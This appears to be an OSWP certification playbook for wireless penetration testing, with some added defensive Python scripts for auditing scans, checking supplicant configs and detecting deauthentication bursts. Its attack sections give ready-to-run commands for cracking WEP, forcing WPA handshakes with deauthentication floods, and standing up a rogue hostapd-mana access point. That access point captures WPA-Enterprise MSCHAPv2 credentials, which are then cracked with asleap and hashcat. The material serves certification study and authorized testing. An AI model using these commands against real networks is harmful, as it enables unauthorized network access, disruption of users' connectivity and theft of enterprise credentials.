OSWP PlayBook V2

Abdulrahman & Zeyad Azima


Table of Contents

1. Reconnaissance
1.1 Setup Interfaces
1.2 Monitor Networks
1.3 Discover Hidden Networks
1.4 Change Channel
1.5 Change MAC Address
2. Connecting to Networks
2.1 Open Networks
2.2 WPA Networks
2.3 WPA-Enterprise Network
2.4 WEP Network
3. Attacking Networks
3.1 Cracking WEP Networks
3.2 Cracking WPA-PSK Networks
3.3 Cracking WPA-Enterprise
4. Install Required Tools & Packages
4.1 FreeRADIUS
4.2 Hostapd-Mana
4.3 Aircrack-ng
4.4 Asleap
4.5 Hashcat
4.6 John the Ripper
5. Resources & Labs
5.1 Resources
5.2 Labs and Linux Dist
6. Contact & Follow Us

Follow The PlayBook Updates

https://github.com/abdoibrahim1337/OSWP-PlayBook
https://zeyadazima.com/notes/oswplaybook/

1. Reconnaissance

1.1 Setup Interfaces

Set Interface to monitor mode

sudo airmon-ng check kill && sudo airmon-ng start <interface>

Set Interface to managed mode

sudo airmon-ng stop <interface>

1.2 Monitor Networks

Monitor networks:

sudo airodump-ng --band abg --manufacturer <interface_in_monitor_mode>

Monitor networks including WPS information:

sudo airodump-ng --band abg --manufacturer --wps <interface_in_monitor_mode>

Monitor a specific network / BSSID:

sudo airodump-ng --band abg --manufacturer --bssid <BSSID> -c <channel> <interface_in_monitor_mode>
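Added example (not part of the playbook): airodump-ng run with -w <prefix> also writes <prefix>-01.csv containing the AP table and the station table. The Python script below parses that CSV the way a defender reviewing a site survey would, and flags open and WEP networks, hidden SSIDs, and the same ESSID served from more than one BSSID (the evil-twin pattern that the enterprise attack in section 3.3 relies on). The CSV content, MAC addresses and network names are constructed for the example; a real review would load the file airodump-ng wrote.

```python
import csv
import io
from collections import defaultdict

# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv when run
# with -w <prefix>: an AP table, a blank line, then a station table. All MACs and
# names are invented for this example.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40, 120, 0,   0.  0.  0.  0,   9, Corp-WiFi, 
00:11:22:33:44:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 36,  54, WPA2, CCMP, MGT, -45, 110, 0,   0.  0.  0.  0,  13, Corp-Ent-WiFi, 
DE:AD:BE:EF:00:01, 2024-01-01 10:02:00, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, MGT, -30,  90, 0,   0.  0.  0.  0,  13, Corp-Ent-WiFi, 
00:11:22:33:44:03, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, OPN,  ,  , -60,  80, 0,   0.  0.  0.  0,   5, Guest, 
00:11:22:33:44:04, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  11, WEP,  WEP,  , -70,  60, 0,   0.  0.  0.  0,   6, Legacy, 
00:11:22:33:44:05, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -55,  40, 0,   0.  0.  0.  0,   0, , 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2024-01-01 10:01:00, 2024-01-01 10:05:00, -50,  10, 00:11:22:33:44:01, Corp-WiFi
AA:BB:CC:DD:EE:02, 2024-01-01 10:03:00, 2024-01-01 10:05:00, -35,  25, DE:AD:BE:EF:00:01, Corp-Ent-WiFi
"""


def _read_table(section):
    """Parse one airodump-ng table (header row first) into dicts with stripped values."""
    rows = [r for r in csv.reader(io.StringIO(section)) if r and r[0].strip()]
    headers = [h.strip() for h in rows[0]]
    return [dict(zip(headers, (v.strip() for v in row))) for row in rows[1:]]


def parse_airodump_csv(text):
    """Split the CSV at the blank line into the AP table and the station table."""
    ap_section, _, station_section = text.strip().partition("\n\n")
    aps = _read_table(ap_section)
    stations = _read_table(station_section) if station_section.strip() else []
    return aps, stations


def audit_aps(aps, stations=()):
    """Flag weak or suspicious access points from the parsed tables."""
    by_essid = defaultdict(list)
    clients = defaultdict(int)
    for station in stations:
        clients[station["BSSID"]] += 1  # associated clients per AP
    findings = {"open": [], "wep": [], "hidden": [], "duplicate_essid": {}}
    for ap in aps:
        bssid, privacy, essid = ap["BSSID"], ap["Privacy"], ap["ESSID"]
        if privacy == "OPN":
            findings["open"].append(bssid)
        elif privacy == "WEP":
            findings["wep"].append(bssid)
        if essid == "" or ap["ID-length"] == "0":
            findings["hidden"].append(bssid)  # beacons carry no SSID
        else:
            by_essid[essid].append(bssid)
    # One ESSID on several BSSIDs is normal for multi-AP sites, but an unknown BSSID
    # appearing next to a known one with the same name is the evil-twin pattern.
    findings["duplicate_essid"] = {e: b for e, b in by_essid.items() if len(b) > 1}
    findings["clients_per_bssid"] = dict(clients)
    return findings


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for key, value in audit_aps(aps, stations).items():
        print(f"{key}: {value}")
```

Compare the duplicate_essid result against the list of BSSIDs you know belong to the site; the clients_per_bssid count tells you whether anyone has already associated to the unknown one.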

1.3 Discover Hidden Networks

Get a hidden network's ESSID using its BSSID (airodump-ng fills in the name once a client associates):

sudo airodump-ng --band abg --bssid <mac> wlan0mon

Get a hidden network's ESSID by brute-forcing it from a wordlist (mdk4 probing mode):

mdk4 wlan0mon p -t <BSSID> -f <wordlist>

1.4 Change Channel

The interface has to be in monitor mode:

sudo iwconfig <interface_in_monitor_mode> channel <number>

1.5 Change MAC Address

1. Stop the network manager:

systemctl stop network-manager

2. Bring the interface down:

ip link set wlan0 down

3. Change the MAC address:

macchanger -m <new_mac_address> <interface>

4. Bring the interface up:

ip link set wlan0 up

Tips

If the change does not succeed, the cause is usually one of the following:

1. The interface name is wrong.
2. The interface is still in monitor mode. In that case set it back to managed mode first:

sudo airmon-ng stop <int>

2. Connecting to Networks

2.1 Connect to Open Network

open.conf

network={
ssid="Open_Network_Name"
key_mgmt=NONE
}

Set ssid to the name of the network you want to connect to. Then save the file as open.conf and connect
using the following command:

sudo wpa_supplicant -i <int> -c <file>

Then open another terminal and request an IP address from the DHCP server:

sudo dhclient wlan0 -v

2.2 Connect to WPA(1/2/3) Networks

WPA

network={
ssid="SSID"
psk="password"
scan_ssid=1
key_mgmt=WPA-PSK
proto=WPA2
}

Set proto to the WPA version the network uses:

WPA (WPA1)

WPA2 (wpa_supplicant also accepts the alias RSN)

WPA3: wpa_supplicant has no proto=WPA3 value; for WPA3-Personal replace key_mgmt=WPA-PSK with key_mgmt=SAE and add ieee80211w=2 (management frame protection is mandatory in WPA3)

Set ssid to the name of the network you want to connect to. Then save the file as wpa.conf and connect using
the following command:

sudo wpa_supplicant -i <int> -c <file>

Then open another terminal and request an IP address from the DHCP server:

sudo dhclient wlan0 -v


2.3 Connect to WPA Enterprise

network={
ssid="SSID"
scan_ssid=1
key_mgmt=WPA-EAP
eap=PEAP
identity="identity\user"
password="password"
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}

Set identity to the username and password to the password.

Set ssid to the name of the network you want to connect to. Then save the file as wpa_entp.conf and connect
using the following command:

sudo wpa_supplicant -i <int> -c <file>

Then open another terminal and request an IP address from the DHCP server:

sudo dhclient wlan0 -v
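Added example (not from the playbook): the wpa_entp.conf above has no ca_cert and no domain_match, so the supplicant accepts any RADIUS server certificate, which is exactly what the fake access point in section 3.3 needs to harvest the MSCHAPv2 exchange. The Python script below parses a wpa_supplicant configuration and reports WPA-EAP blocks that lack server validation, next to a hardened block that pins the CA and the server name. The configuration text, file paths and names are constructed for the example.

```python
import re

# Constructed sample wpa_supplicant configuration with two WPA-EAP network blocks.
# The first mirrors the playbook's wpa_entp.conf (no server-certificate checks);
# the second pins the RADIUS server's CA and name. Paths and names are invented.
SAMPLE_CONF = """\
ctrl_interface=/run/wpa_supplicant

network={
    ssid="Corp-WiFi"
    scan_ssid=1
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="corp\\user"
    password="password"
    phase1="peaplabel=0"
    phase2="auth=MSCHAPV2"
}

network={
    ssid="Corp-WiFi-Hardened"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="corp\\user"
    password="password"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_match="radius.corp.example"
    phase1="peaplabel=0"
    phase2="auth=MSCHAPV2"
}
"""

BLOCK_RE = re.compile(r"network=\{(.*?)\}", re.S)
# Any of these directives ties the server certificate to an expected name.
NAME_CHECKS = ("domain_match", "domain_suffix_match", "altsubject_match")


def parse_networks(conf_text):
    """Return one dict per network={...} block, mapping key -> value (quotes stripped)."""
    networks = []
    for body in BLOCK_RE.findall(conf_text):
        entry = {}
        for line in body.splitlines():
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip().strip('"')
        networks.append(entry)
    return networks


def audit_eap_network(net):
    """Return the weaknesses of one block; an empty list means the server is validated."""
    findings = []
    if net.get("key_mgmt") != "WPA-EAP":
        return findings  # PSK and open networks are outside this check
    if "ca_cert" not in net:
        findings.append("no ca_cert: any server certificate is accepted")
    if not any(k in net for k in NAME_CHECKS):
        findings.append("no domain_match/domain_suffix_match/altsubject_match: "
                        "any certificate issued by the CA is accepted, whatever its name")
    inner = net.get("phase2", "").lower()
    if "ca_cert" not in net and "mschapv2" in inner:
        findings.append("MSCHAPv2 inside an unverified tunnel: the challenge/response "
                        "pair can be captured by a rogue AP and cracked offline")
    return findings


def audit_conf(conf_text):
    """Map each ssid in the configuration to its findings."""
    return {net.get("ssid", "?"): audit_eap_network(net) for net in parse_networks(conf_text)}


if __name__ == "__main__":
    for ssid, findings in audit_conf(SAMPLE_CONF).items():
        print(f"{ssid}: {'OK' if not findings else 'WEAK'}")
        for finding in findings:
            print("  -", finding)
```

Run it against the supplicant configurations deployed on managed laptops; every WPA-EAP block it reports as WEAK will happily complete PEAP against the hostapd-mana access point from section 3.3.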

2.4 Connect to WEP Network

network={
ssid="SSID"
key_mgmt=NONE
wep_key0=""
wep_tx_keyidx=0
}

Note: If the WEP key (wep_key0) is given in hex, write it without quotes; both lowercase and uppercase hex digits work.

Set ssid to the name of the network you want to connect to. Then save the file as wep.conf and connect using
the following command:

sudo wpa_supplicant -i <int> -c <file>

Then open another terminal and request an IP address from the DHCP server:

sudo dhclient wlan0 -v

3. Attacking Networks

3.1 Cracking WEP Networks

1. Capture packets from the WEP network:

sudo airodump-ng -w <pcap_file_name> --band abg --bssid <mac> -c <channel> wlan0mon

2. Send a fake authentication:

sudo aireplay-ng -1 0 -a <BSSID> -h <Interface_Mac> -e "ESSID" <Interface>

Note: -h takes your interface's MAC address; any address can be given here if you want to spoof one.

3. ARP replay attack:

sudo aireplay-ng --arpreplay -b <BSSID> -h <Interface_mac_address> <interface_in_monitor_mode>

4. Crack the password (wep-01.cap is the capture written in step 1 with the prefix wep):

sudo aircrack-ng wep-01.cap

3.2 Cracking WPA-PSK Networks

1. Gather information about the target network (channel, BSSID):

sudo airodump-ng --band abg <interface_in_monitor_mode>

In the airodump-ng output, a network whose ENC column shows WPA with no version number is WPA1.

2. Capture the handshake:

sudo airodump-ng <interface_in_monitor_mode> --bssid <BSSID> -c <channel> -w <pcap_file_name>

3. Perform a de-authentication attack (kick a specific client off the network so it reconnects and the handshake can be captured):

sudo aireplay-ng -0 5 -c <client-mac> -a <BSSID> <interface_in_monitor_mode>

Note: Drop the -c option to send it as broadcast (kick all clients).

4. Wait until airodump-ng reports the handshake.

5. Once the EAPOL handshake is captured, crack the password with aircrack-ng:

sudo aircrack-ng -w <wordlist> capfile.cap

Then connect to the network as described in section 2 (Connecting to Networks).


3.3 Cracking WPA-Enterprise

1. First, we gather information about the network (BSSID, channel) so we can filter on it:

sudo airodump-ng --band abg <interface_in_monitor_mode>

2. Then we capture the handshake of the enterprise network:

sudo airodump-ng --band abg -c <channel> --bssid <BSSID> -w <pcap_file_name> <interface_in_monitor_mode>

3. After that we look at the clients of the network and de-authenticate one to get the PMKID/handshake for the network:

sudo aireplay-ng -0 4 -a <BSSID> -c <client_mac> <interface_in_monitor_mode>

Then we wait until we get the handshake; in some cases we can also wait for a client to connect on its own.
4. Once we have it, we go through the cap file and extract the identity (username) from the EAP Response/Identity frame.

5. Extract the server certificate from the capture.

Note: Save the certificate in DER format.

6. Display the certificate's information with this command:

openssl x509 -inform der -in CERTIFICATE_FILENAME -text

7. Fake the network using FreeRADIUS. Go to /etc/freeradius/3.0/certs and edit the following two files with the
information obtained from the certificate:

nano ca.cnf

nano server.cnf

9. After that, run the following commands under /etc/freeradius/3.0/certs to generate the
Diffie-Hellman parameters for hostapd-mana:

rm dh
make

make may end with an error; it can be ignored.

10. Create the EAP user file mana.eap_user with the following content:

* PEAP,TTLS,TLS,FAST
"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2
"pass" [2]
11. After that we create a fake access point by creating a file called network.conf under any other
directory

12. We paste the following configurations in the file and modify it to our needs:

ssid=<ESSID>
interface=<managed_mode_interface>
driver=nl80211

channel=<channel>
hw_mode=a
ieee8021x=1
eap_server=1
eapol_key_index_workaround=0

eap_user_file=/etc/hostapd-mana/mana.eap_user

ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key

private_key_passwd=whatever

dh_file=/etc/freeradius/3.0/certs/dh

auth_algs=1
wpa=3
wpa_key_mgmt=WPA-EAP

wpa_pairwise=CCMP TKIP
mana_wpe=1
mana_credout=/tmp/hostapd.credoutfile
mana_eapsuccess=1
mana_eaptls=1
13. Turn the interface back to managed mode.

14. Then use the following command to create the fake AP:

sudo hostapd-mana <file.conf>

15. Perform a de-authentication attack (kick a specific client off the network to get the handshake),
using another interface:

sudo aireplay-ng -0 0 -c <client-mac> -a <BSSID> <interface_in_monitor_mode>

Note: Drop the -c option to send it as broadcast (kick all clients).

You need a second interface in monitor mode for this, and it has to be set to the same channel as the
target network (see 1.4 Change Channel) before performing the de-authentication attack.

Tip: If there are two enterprise networks with the same name, you need to perform the de-authentication
attack on both of them.

16. Once you get a handshake, copy the asleap command that hostapd-mana prints and append -W
/path/to/wordlist, for example:

asleap -C do:3b:8d:7b:22:00:0:91 -R 68:09:13:ac:e8:df:36:5f:42:94:fb:97:91:05:2:21:72:ff:b3:ce:c0:ca:26:f7 -W /usr/share/john/password.lst

Note: If that does not work, take the hashcat-format hash instead, put it in a file called
hashfile and crack it with this command:

hashcat -a 0 -m 5500 hashfile rockyou.txt --force

17. After getting the username and password, go to the connecting-to-networks section.
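Added example (not from the playbook), covering the de-authentication steps of sections 3.2 and 3.3 from the detection side: the Python code below decodes the 802.11 MAC header of raw frames, picks out deauthentication and disassociation frames, and raises an alert when one transmitter sends a burst of them inside a short window, which is the traffic pattern aireplay-ng -0 produces. The capture is constructed inside the script as a test fixture with invented MAC addresses; a real deployment would feed it frames read from a monitor-mode interface or a pcap (for example with scapy), which is not shown here. Enabling 802.11w (management frame protection) on the AP makes clients discard unprotected deauthentication frames and is the standard mitigation.

```python
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"

# Subset of 802.11 reason codes seen in deauthentication / disassociation bodies.
REASON_CODES = {1: "unspecified", 3: "STA leaving", 6: "class 2 frame from unauth STA",
                7: "class 3 frame from unassociated STA", 8: "STA leaving BSS"}


def _mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_80211(frame):
    """Decode the 24-byte 802.11 MAC header, plus the reason code of a deauth/disassoc."""
    if len(frame) < 24:
        raise ValueError("frame shorter than an 802.11 MAC header")
    fc = frame[0]
    info = {
        "type": (fc >> 2) & 0x3,      # 0 = management, 1 = control, 2 = data
        "subtype": (fc >> 4) & 0xF,   # management: 8 = beacon, 10 = disassoc, 12 = deauth
        "addr1": _mac(frame[4:10]),   # receiver
        "addr2": _mac(frame[10:16]),  # transmitter
        "addr3": _mac(frame[16:22]),  # BSSID for most frames
        "seq": int.from_bytes(frame[22:24], "little") >> 4,
        "reason": None,
    }
    if info["type"] == 0 and info["subtype"] in (10, 12) and len(frame) >= 26:
        info["reason"] = int.from_bytes(frame[24:26], "little")
    return info


def detect_deauth_bursts(frames, window=1.0, threshold=10):
    """frames: iterable of (timestamp_seconds, raw_bytes). One alert per transmitter that
    sends `threshold` or more deauth/disassoc frames inside any `window`-second interval."""
    per_source = defaultdict(list)
    for ts, raw in frames:
        f = parse_80211(raw)
        if f["type"] == 0 and f["subtype"] in (10, 12):
            per_source[f["addr2"]].append((ts, f))
    alerts = []
    for src, events in per_source.items():
        events.sort(key=lambda e: e[0])
        times = [e[0] for e in events]
        best, j = 0, 0
        for i in range(len(times)):  # two-pointer sliding window over timestamps
            while times[i] - times[j] > window:
                j += 1
            best = max(best, i - j + 1)
        if best >= threshold:
            alerts.append({
                "source": src,
                "max_per_window": best,
                "total": len(events),
                "broadcast": any(e[1]["addr1"] == BROADCAST for e in events),
                "reasons": sorted({e[1]["reason"] for e in events}),
            })
    return alerts


# Constructed capture (test fixture): two beacons, one data frame, then a burst of 25
# broadcast deauthentication frames whose transmitter address claims to be the AP.
_AP, _CLIENT, _BCAST = "001122334401", "aabbccddee01", "ffffffffffff"
BEACON = bytes.fromhex("8000" "0000" + _BCAST + _AP + _AP + "0000")
DATA = bytes.fromhex("0801" "0000" + _AP + _CLIENT + _AP + "1000")  # ToDS data, client -> AP


def _deauth_frame(seq, reason=7):
    seq_ctrl = (seq << 4).to_bytes(2, "little").hex()
    body = reason.to_bytes(2, "little").hex()
    return bytes.fromhex("c000" "0000" + _BCAST + _AP + _AP + seq_ctrl + body)


SAMPLE_CAPTURE = ([(0.0, BEACON), (0.1, BEACON), (0.5, DATA)]
                  + [(1.0 + i * 0.01, _deauth_frame(100 + i)) for i in range(25)]
                  + [(3.0, BEACON)])

if __name__ == "__main__":
    for alert in detect_deauth_bursts(SAMPLE_CAPTURE):
        names = [REASON_CODES.get(r, str(r)) for r in alert["reasons"]]
        print(f"deauth burst from {alert['source']}: {alert['max_per_window']} frames in 1s, "
              f"broadcast={alert['broadcast']}, reasons={names}")
```

A burst of broadcast deauthentication frames with a single reason code, all claiming to come from the BSSID while the legitimate AP keeps beaconing, is the signature to look for; the same logic works for the targeted variant (addr1 set to one client) since the count is per transmitter, not per receiver.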

4. Install Required Tools & Packages:

4.1 FreeRADIUS

sudo apt update


sudo apt install freeradius freeradius-utils

4.2 Hostapd-Mana

sudo apt update


sudo apt install libssl-dev libnl-3-dev libnl-genl-3-dev
git clone https://github.com/sensepost/hostapd-mana.git
cd hostapd-mana/hostapd
make
sudo make install

4.3 Aircrack-ng

sudo apt update


sudo apt install aircrack-ng

4.4 Asleap

sudo apt update


sudo apt install asleap

4.5 Hashcat

sudo apt update


sudo apt install hashcat

4.6 John the Ripper

sudo apt update


sudo apt install john

5. Resources & Labs

5.1 Resources

https://github.com/dh0ck/Wi-Fi-Pentesting-Cheatsheet
https://github.com/drewlong/oswp_notes

https://r4ulcl.com/posts/walkthrough-wifichallenge-lab-2.0/

5.2 Labs and Linux Dist

Labs 5.2.1

https://wifichallengelab.com
https://github.com/r4ulcl/WiFiChallengeLab-docker

Note: This lab needs no physical wireless card; everything runs inside the lab virtual machine, which
includes all the tooling. Shout-out to r4ulcl for this amazing lab.

5.2.2 Linux Dist

https://www.wifislax.com: Wireless Pentest OS

6. Contact & Follow Us

GitHub: Abdulrahman, Zeyad

LinkedIn: Abdulrahman, Zeyad

Twitter/X: Abdulrahman, Zeyad

Website: Zeyad

Email: 0xexploiteagle@gmail.com, contact@zeyadazima.com
